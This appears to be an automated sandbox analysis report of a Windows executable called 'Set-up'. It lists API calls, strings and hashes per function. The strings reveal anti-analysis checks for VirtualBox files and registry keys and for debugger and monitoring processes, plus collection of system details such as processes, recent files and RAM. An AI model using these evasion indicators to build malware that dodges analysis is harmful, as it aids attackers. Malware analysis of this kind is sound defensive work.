_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CBA6A1
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CBA6AB
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CBA6AF

Part of subcall function 00C9D090: GetLastError.KERNEL32 ref: 00C9D0A1
Part of subcall function 00C9D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C9D0A9
Part of subcall function 00C9D090: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C9D0CD
Part of subcall function 00C9D090: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C9D0D7
Part of subcall function 00C9D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A), ref: 00C9D381
Part of subcall function 00C9D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000D), ref: 00C9D3A2
Part of subcall function 00C9D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C9D3BF
Part of subcall function 00C9D090: GetLastError.KERNEL32 ref: 00C9D3C9
Part of subcall function 00C9D090: SetLastError.KERNEL32(00000000), ref: 00C9D3D4

Part of subcall function 00CC4F40: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00CC4F9E

setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00CBA831
WSAGetLastError.WS2_32 ref: 00CBA854
getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 00CBA97A
setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 00CBA9A6
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00CBAB0F
htons.WS2_32(?), ref: 00CBAC01
getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 00CBAC38
setsockopt.WS2_32(?,0000FFFF,00001001,00004020,00000004), ref: 00CBAC64
WSAGetLastError.WS2_32 ref: 00CBACDC
WSAGetLastError.WS2_32 ref: 00CBADF5
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000025), ref: 00CBAE9D
htons.WS2_32(?), ref: 00CBAEDB
bind.WS2_32(?,00000002,00000010), ref: 00CBAEF5
WSAGetLastError.WS2_32 ref: 00CBAFB9
htons.WS2_32(?), ref: 00CBAFFC
bind.WS2_32(?,?,?), ref: 00CBB014
WSAGetLastError.WS2_32 ref: 00CBB056
htons.WS2_32(?), ref: 00CBB0D2
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,00000000,0000000A), ref: 00CBB0EA

Strings

bind failed with errno %d: %s, xrefs: 00CBB080
Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00CBAD0A
sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00CBA6CE
Name '%s' family %i resolved to '%s' family %i, xrefs: 00CBADAC
cf_socket_open() -> %d, fd=%d, xrefs: 00CBA796
Local port: %hu, xrefs: 00CBAF28
cf-socket.c, xrefs: 00CBA5CD, 00CBA735
Could not set TCP_NODELAY: %s, xrefs: 00CBA871
@, xrefs: 00CBA8F4
Local Interface %s is ip %s using address family %i, xrefs: 00CBAE60
Bind to local port %d failed, trying next, xrefs: 00CBAFE5
@, xrefs: 00CBAC42
Couldn't bind to '%s' with errno %d: %s, xrefs: 00CBAE1F
Trying %s:%d..., xrefs: 00CBA7C2, 00CBA7DE
Trying [%s]:%d..., xrefs: 00CBA689

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: ErrorLast$_errno$htonssetsockopt$bindgetsockoptstrrchr$CounterPerformanceQuery__sys_errlist__sys_nerrstrchrstrcpystrlenstrtoul
String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
API String ID: 2815861332-2373386790
Opcode ID: bca7bb88118cbc239f91d8b072f43c90a5286bb212fbf01e09883e8db6275a5b
Instruction ID: 4b3299fe31ef7dec704a93dec71490957a7afb53d3b70fd67f13324d6ab9a25e
Opcode Fuzzy Hash: bca7bb88118cbc239f91d8b072f43c90a5286bb212fbf01e09883e8db6275a5b
Instruction Fuzzy Hash: 7B62E071508381ABE7208F24C846BEBB7F8BF95304F04492DF99997292E771E945CB93

Function 00C829FF Relevance: 63.3, APIs: 20, Strings: 16, Instructions: 321
stringprocessregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNELBASE ref: 00C82A27
RegOpenKeyExA.KERNELBASE ref: 00C82A8A
CharUpperA.USER32 ref: 00C82AEF
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00C82B05
CreateToolhelp32Snapshot.KERNEL32 ref: 00C82B6D
Process32First.KERNEL32 ref: 00C82B88
Process32Next.KERNEL32 ref: 00C82BC0
QueryFullProcessImageNameA.KERNELBASE ref: 00C82C26
CloseHandle.KERNELBASE ref: 00C82C49
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00C82C5F
CreateToolhelp32Snapshot.KERNEL32 ref: 00C82CC4
Process32First.KERNEL32 ref: 00C82CDF
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00C82D0D
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00C82D42
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00C82D5C
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00C82D76
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00C82D90
Process32Next.KERNEL32 ref: 00C82DBF
CloseHandle.KERNELBASE ref: 00C82DFC
EnumWindows.USER32 ref: 00C82E21

Strings

dbg_sec, xrefs: 00C82DDE
ida.exe, xrefs: 00C82D7F
vbox_first, xrefs: 00C82A49
0, xrefs: 00C82DA9
vbox_second, xrefs: 00C82AAB
dbg_third, xrefs: 00C82E48
wireshark.exe, xrefs: 00C82D31
C:\Windows\System32\VBox*.dll, xrefs: 00C82A1B
dbg, xrefs: 00C82C80
x64dbg.exe, xrefs: 00C82D65
public_check, xrefs: 00C82B26
SYSTEM\ControlSet001\Services\VBoxSF, xrefs: 00C82A76
WINDBG.EXE, xrefs: 00C82C4E
C:\USERS\PUBLIC\, xrefs: 00C82AF4
procmon.exe, xrefs: 00C82D4B
yadro, xrefs: 00C82EFB

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: strstr$Process32$First$CloseCreateHandleNextSnapshotToolhelp32$CharEnumFileFindFullImageNameOpenProcessQueryUpperWindowsstrncpy
String ID: 0$C:\USERS\PUBLIC\$C:\Windows\System32\VBox*.dll$SYSTEM\ControlSet001\Services\VBoxSF$WINDBG.EXE$dbg$dbg_sec$dbg_third$ida.exe$procmon.exe$public_check$vbox_first$vbox_second$wireshark.exe$x64dbg.exe$yadro
API String ID: 515599682-3783588604
Opcode ID: 53d9dcd66b3f8d5a75b5cd315f09cca0e9d886c5c0d6aee114d6fc21c84c37a1
Instruction ID: bdb082afe548efc0113f3574f30ba580890d7a820e771810e15cc8d479ac20bc
Opcode Fuzzy Hash: 53d9dcd66b3f8d5a75b5cd315f09cca0e9d886c5c0d6aee114d6fc21c84c37a1
Instruction Fuzzy Hash: 9EE1D4B4905305DFDB54EF69DA8469EBBF4AF84304F40886AE998E7344E734DA48CF42

Function 00C8255D Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 282
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNELBASE ref: 00C82579

Part of subcall function 011561F0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00C82589), ref: 01156205

GlobalMemoryStatusEx.KERNELBASE ref: 00C825CC
GetLogicalDriveStringsA.KERNEL32 ref: 00C82619
GetDriveTypeA.KERNELBASE ref: 00C82647
GetDiskFreeSpaceExA.KERNELBASE ref: 00C8267E
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00C82749
KiUserCallbackDispatcher.NTDLL ref: 00C827E2
SHGetKnownFolderPath.SHELL32 ref: 00C8286D
wcscpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00C828BE
wcscat.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00C828D4
FindFirstFileW.KERNELBASE ref: 00C828F8
FindNextFileW.KERNELBASE ref: 00C8291F
K32EnumProcesses.KERNEL32 ref: 00C8296F

Strings

recent_files, xrefs: 00C82941
Num_processor, xrefs: 00C8258D
name, xrefs: 00C826A2
processes, xrefs: 00C82996
Num_ram, xrefs: 00C825F0
@, xrefs: 00C825B4
resolution_x, xrefs: 00C8280D
uptime_minutes, xrefs: 00C829E4
`, xrefs: 00C829BC
drivers, xrefs: 00C82769
free, xrefs: 00C8271E
Num_displays, xrefs: 00C827C3
resolution_y, xrefs: 00C8282F
all, xrefs: 00C826E0

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: DriveFileFind$CallbackDiskDispatcherEnumFirstFolderFreeGlobalInfoKnownLogicalMemoryNextPathProcessesSpaceStatusStringsSystemTypeUsermallocstrlenwcscatwcscpy
String ID: @$Num_displays$Num_processor$Num_ram$`$all$drivers$free$name$processes$recent_files$resolution_x$resolution_y$uptime_minutes
API String ID: 2116500361-3337672980
Opcode ID: e7dcc49943abb15a1d3bda3ebcb353191f11dc151f94cf9222bdf4bdf17bc462
Instruction ID: 34735159a94cee5e9ad2bfb92cd6db841870782c73830af2c896a393e38a49cd
Opcode Fuzzy Hash: e7dcc49943abb15a1d3bda3ebcb353191f11dc151f94cf9222bdf4bdf17bc462
Instruction Fuzzy Hash: 9BD1A3B49047099FCB54EF68C98469EBBF4FF58344F40896DE8A897344E7349A84CF92

Function 00CBF100 Relevance: 29.3, APIs: 1, Strings: 15, Instructions: 1303networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(?), ref: 00CBF75B

Part of subcall function 00C9D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,00C901B1), ref: 00C9D8E2

Strings

ipv4, xrefs: 00CBF331, 00CBF34B, 00CBF36C, 00CBF3EC, 00CBF5BB
%s starting (timeout=%lldms), xrefs: 00CBFCDD, 00CBFEB1
Connection timeout after %lld ms, xrefs: 00CC00AC
created %s (timeout %lldms), xrefs: 00CBF4BE, 00CBF5DF
Connection time-out, xrefs: 00CBF2A3
connect.c, xrefs: 00CBF3BB, 00CBF4FA
ipv6, xrefs: 00CBF3DC
%s connect timeout after %lldms, move on!, xrefs: 00CBFA33
Connected to %s (%s) port %u, xrefs: 00CC0026
%s connect -> %d, connected=%d, xrefs: 00CBF720
Failed to connect to %s port %u after %lld ms: %s, xrefs: 00CC0254
all eyeballers failed, xrefs: 00CC00FF
%s trying next, xrefs: 00CBF8FE
%s done, xrefs: 00CBF9CD, 00CBFD27, 00CBFF03
%s assess started=%d, result=%d, xrefs: 00CC0150, 00CC01AE

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: CounterErrorLastPerformanceQuery
String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
API String ID: 1297246462-1590685507
Opcode ID: 22cdaa969006c78bc0a6f7c400e3736b32d510c4f352ac9c338fbf8a9ec3f130
Instruction ID: 77838f2af6e21cc21cd16ea8bdfce91792af3ad4b9e7b4f0f63d653bd749220d
Opcode Fuzzy Hash: 22cdaa969006c78bc0a6f7c400e3736b32d510c4f352ac9c338fbf8a9ec3f130
Instruction Fuzzy Hash: 92C28F31A043449FD724CF29C884BAAB7E1BF84314F15866DEC999B362D771EE85CB81

Function 00D4AA30 Relevance: 19.9, APIs: 13, Instructions: 364
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

htons.WS2_32(?), ref: 00D4AAE8
htons.WS2_32(?), ref: 00D4AB33
socket.WS2_32(FFFFFFFF,?,00000000), ref: 00D4AB9A
ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00D4ABE3
setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 00D4AC02
setsockopt.WS2_32(?,0000FFFF,00001002,00000000,00000004), ref: 00D4AC29
htonl.WS2_32(00000000), ref: 00D4AC69
bind.WS2_32(?,00000017,0000001C), ref: 00D4ACCF
setsockopt.WS2_32(?,00000029,0000001B,0000001C,00000004), ref: 00D4ACFE
setsockopt.WS2_32(?,00000006,00000001,0000001C,00000004), ref: 00D4AD20
WSAGetLastError.WS2_32 ref: 00D4ADB5
closesocket.WS2_32(?), ref: 00D4AE6F

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: setsockopt$htons$ErrorLastbindclosesockethtonlioctlsocketsocket
String ID:
API String ID: 4039825230-0
Opcode ID: a03f16627a6e023131128d40e7e4077325b72fcf2447c7c81014b6e823c5b0ae
Instruction ID: c70bc1d6a86674d23a764a13133e85b31c783302af263e889042b311511d19fe
Opcode Fuzzy Hash: a03f16627a6e023131128d40e7e4077325b72fcf2447c7c81014b6e823c5b0ae
Instruction Fuzzy Hash: 83E1C2746443019FE720CF28D844B6BB7E5FF88314F184A2DF9A98B291E775E944CB62

Function 00C8116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00C811B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00C81238
_set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C8124D
__p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C81261
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00C812EB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00C81323
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00C8132E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00C81344
GetStartupInfoA.KERNEL32 ref: 00C81433

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdln_set_invalid_parameter_handlermemcpystrlen
String ID:
API String ID: 3873122205-0
Opcode ID: 7997f4cf645b04489008d39f3fc2a26baa0104d7069f8fc619efb5d711a562a9
Instruction ID: 90e3a12e9b708e36c2c2bc74a272f37f5c3f6e8be5e8752293ec8781f12db612
Opcode Fuzzy Hash: 7997f4cf645b04489008d39f3fc2a26baa0104d7069f8fc619efb5d711a562a9
Instruction Fuzzy Hash: B481D075904305CFDB24EFA4D0847AEB7E8FB54308F08452DDD998B344DB35A945CB85

Function 01008E90 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 01008EAD
_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 01008EFA
_write.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 01008F4A
_close.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 01008F59

Strings

CONOUT$, xrefs: 01008EA6
@, xrefs: 0115E701
terminated, xrefs: 01008F20

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$@$CONOUT$
API String ID: 28676597-491099378
Opcode ID: c1dccab27d93870d9c351ec80bbb3d3369d7f86bcde6969e39ec36126c7d2f18
Instruction ID: a297b27d0ee842f54e37486dcf91ad5fcaccccbe6f816c553733f2567c68bbfc
Opcode Fuzzy Hash: c1dccab27d93870d9c351ec80bbb3d3369d7f86bcde6969e39ec36126c7d2f18
Instruction Fuzzy Hash: C1414CB4D043058FEB51EF78D44466EBBF4BB48314F408A2EE998D7284E738D545CB56

Function 01153F30 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

error CryptGenRandom 0x%08lx, xrefs: 011540A9

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID:
String ID: error CryptGenRandom 0x%08lx
API String ID: 0-1222942552
Opcode ID: 3fc40c6d4fc4d1987ef137e3399e7cca273e2891fd0d0f77c5aecb1ad83306b4
Instruction ID: 49ba4a239767891b7ca204b6a7afbc8b376d98d5301a41e52a0eca74d1a296e2
Opcode Fuzzy Hash: 3fc40c6d4fc4d1987ef137e3399e7cca273e2891fd0d0f77c5aecb1ad83306b4
Instruction Fuzzy Hash: 9A41E2B99093019FD700EF78D18865ABBE4BB88314F458E2EE8D887354EB38D5498F42

Function 00C905B0 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 369
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAEventSelect.WS2_32(?,8508C483,?), ref: 00C90711
getsockopt.WS2_32(?,0000FFFF,00001008,?,00000004), ref: 00C90783
WSAWaitForMultipleEvents.WS2_32(00000001,00C83EBE,00000000,00000000,00000000), ref: 00C9086F
WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00C908EF
WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00C90934
WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00C909DC
WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00C909FB
